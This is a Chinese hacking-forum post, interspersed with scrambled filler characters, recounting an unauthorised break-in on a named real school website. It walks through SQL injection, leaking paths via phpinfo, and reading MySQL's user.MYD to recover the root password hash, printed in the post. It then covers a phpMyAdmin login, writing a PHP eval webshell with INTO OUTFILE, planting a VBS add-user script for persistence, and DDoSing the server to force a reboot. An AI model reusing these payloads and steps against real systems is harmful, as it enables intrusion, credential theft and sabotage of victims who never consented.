第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏$ h& k8 F y3 F
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
; Q( P/ r$ t I& @% K; }3 E
( F+ g8 }& _4 S4 p; ~* B* J: [" v" |0 `, j, T
/ C! ?! g' v9 H0 j9 b4 P常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
9 Y2 g8 _# Y3 P# J
; J1 ?: z5 U8 S5 [7 a# R/ E那么想可以直接写入shell ,getshell有几个条件:& D, O% C9 K+ m5 @" Z; o
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF * e) i" v, Y6 c5 \$ a9 w) s: f
6 h( ^) B$ [2 f% s
试着爆绝对路径: . X$ y7 K0 a: y8 j/ D9 O9 [
1./phpMyAdmin/index.php?lang[]=1 - o# D8 C- j6 U. M
2./phpMyAdmin/phpinfo.php
/ T/ h# t3 ^$ s" x( D3./load_file()
- O! Y* U p# G4 o4./phpmyadmin/themes/darkblue_orange/layout.inc.php
8 }" }3 e7 O. y* e2 G5./phpmyadmin/libraries/select_lang.lib.php
) l2 P3 O: c1 a7 p) J9 M6./phpmyadmin/libraries/lect_lang.lib.php
4 j" \5 E5 c3 k/ b/ b8 ~2 a7./phpmyadmin/libraries/mcrypt.lib.php 4 S' A: r7 U& v& O! f4 b
8./phpmyadmin/libraries/export/xls.php / n- H/ l0 L8 _' m6 {% E* e2 R
1 a: t8 _2 F! d均不行........................... . ]5 ]1 T) [, M: K r, D
: S1 w' K# l! ?- f! u8 @ P
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php 0 H9 q8 L! }/ n0 \2 a- n) R* v; @
# D* j3 l5 R) O2 K# w. F权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
* m4 h3 ~& v$ c2 M' ?+ c7 p6 |3 i; V" G8 V: l
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
; e6 u% d- j' c5 r. i8 Y5 G7 Y$ x. v( G
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... ' |; K1 ^9 i) _' ~0 s8 g
) ~6 @$ D# Y+ v* Z想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
" x7 |& M0 n# t$ K: ]% \2 `
2 r2 ^, `1 }! ^( g' u+ B" |# ohttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 5 q* A4 t( x( m
/ d9 `! P" G- n自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ; z! h* `1 ~5 A+ Y( K8 z
9 G2 u9 I% }- D7 v4 O2 ?
成功读到root密码: " I2 Q g$ q9 Q- N
! Q* I1 ]! }3 H" @9 j17---- r(0072)
0 W% A3 m, D1 J7 H% ]/ l18---- o(006f)
7 q$ E! I' t% l( i9 `19---- o(006f) 3 j/ a" K/ m# ]% L+ k! m6 u8 r3 |
20---- t(0074) ( {3 a1 D2 l* Y4 P7 W1 m/ ?# N# O
21---- *(002a) . I3 T( t# W- A, m) c
22---- 8(0038)
, d! y8 {2 \7 ]6 d% I23---- 2(0032)
! G) V8 ]$ o. T- |& s: x G24---- E(0045) % ` |* L% |7 l: g5 ]8 I3 @
25---- 1(0031)
' d; u; e- M8 L5 m26---- C(0043) ) }) r5 [8 O9 ~/ R/ |
27---- 5(0035) : _- e2 Q. o' [8 e7 C! e( C
28---- 8(0038) 9 ?1 c6 u* v& r1 D
29---- 2(0032)
4 o: r8 z# T! d30---- 8(0038) + i$ i. p2 e( @* p7 O5 v) B
31---- A(0041)
+ V4 `7 z# q2 D1 n. W32---- 9(0039) , r. k# X# Y# D7 k
33---- B(0042) 7 A: G" L; |$ X- e
34---- 5(0035) ! G$ ^- y0 a3 f* J! g2 m: w0 e
35---- 4(0034) ( f- w {: Z; b9 K" z+ F
36---- 8(0038) & V2 t, i/ \' S) k' n
37---- 6(0036) ! m- W+ T y6 H+ R+ g: o
38---- 4(0034) 6 f4 l- N; Q6 n1 z) F6 ^8 O
39---- 9(0039)
- j3 ?$ X# T* P2 m40---- 1(0031)
. |0 b" ?3 f6 t. h P( w. y41---- 1(0031) ) z* Z% E$ w5 p" D/ [$ T
42---- 5(0035)
9 U' {- r; o2 c8 T: R4 v43---- 3(0033) ! S' J" s; @- J9 ]" T2 @
44---- 5(0035) 5 [% D# A% m: E6 f
45---- 9(0039) 6 x% B" T# Q! G( G
46---- 8(0038) [; i/ R; u( A- k2 H' h7 I
47---- F(0046) 1 \# W1 M8 a$ a4 y5 L2 J7 c+ \
48---- F(0046) , _" T, }1 w+ M! |# o0 A/ C
49---- 4(0034)
6 F- y8 j. B2 X# H. o3 c( {50---- F(0046) ! a- e6 [% f2 j
51---- 0(0030) 6 A1 S3 d8 I! \( @
52---- 3(0033)
; g$ n! b6 V# W. G53---- 2(0032)
- B! ?6 f4 ?& x% l+ N. H/ {5 e54---- A(0041) M8 x, c: p. i6 ^8 W& D
55---- 4(0034) - i1 E0 l+ u' U# U% B
56---- A(0041)
i% G) A2 `$ e% f% P+ h57---- B(0042)
+ i6 r3 C5 d% ?# N5 T, ?' j* S, d) |58---- *(0044)
/ [4 ?0 V9 x8 i5 f6 `* V) {9 s59---- *(0035)
6 |+ j- Q y: r [$ \2 h) }60---- *(0041)
+ ]( f m' ?6 m U+ i6 G3 C61---- *0032) 0 @0 b; ]* V. w9 p
7 V0 B: V7 R3 g; I解密后成功登陆phpmyamin
2 T7 Q( `# Z# v0 ]5 u4 ~) [ $ r& K5 W! O3 F9 t* o
4 [# A# y+ z3 d: _7 z* i9 F
, m3 I8 [' J/ [& a& J' [7 ]) ~7 e" k J, N
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
8 i( G$ \* R% @, T& ]" j& B& T
8 f4 M7 h6 A3 m成功执行,拿下shell,菜刀连接: 4 i7 J% {9 o- @5 t5 K& ~" F+ t
; S8 i3 A5 z% _* x; u+ s服务器不支持asp,aspx,php提权无果...................
0 n3 M/ ^+ I+ k% R* d1 v1 j8 j6 U3 m/ D5 R2 f. a' X2 o
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
- m3 r! }+ }5 I9 f, ^! F7 P/ ]服务器上已经有个隐藏帐号了
$ r# G0 Q% T( J" K, n' [别名 administrators5 M4 k/ }, A6 X r1 q
注释 管理员对计算机/域有不受限制的完全访问权 . k6 @0 v0 G+ Y% J7 r7 q# n
成员
; A3 Y; {& e1 e/ k% X+ S/ K- Q-------------------------------------------------------------------------------
/ S7 j! O) Y7 K7 ladmin
7 `" ]4 T' E/ L( O7 N. PAdministrator
: r6 \" z" w2 Q+ ~; ?+ t0 Sslipper$
/ v! |8 v6 Z4 t, X. c( S3 Q; c# Isqluser8 H/ y' `' c# B9 A
命令成功完成。
/ q5 x- S' v" p9 L+ n( `- p' J/ ^) h- }# h- R! O( d: U M8 m
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。8 \$ G5 k7 [+ m @7 ~) H3 m+ P. \* ~
2 F! }: c9 a) N `: s1 i- G; Zddos服务器重启,不然就只能坐等服务器重启了...............................
) | k; T0 Y6 K) _2 j2 P9 \, _8 Z) u- L+ f) o
! w5 [9 B$ F( R# p
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
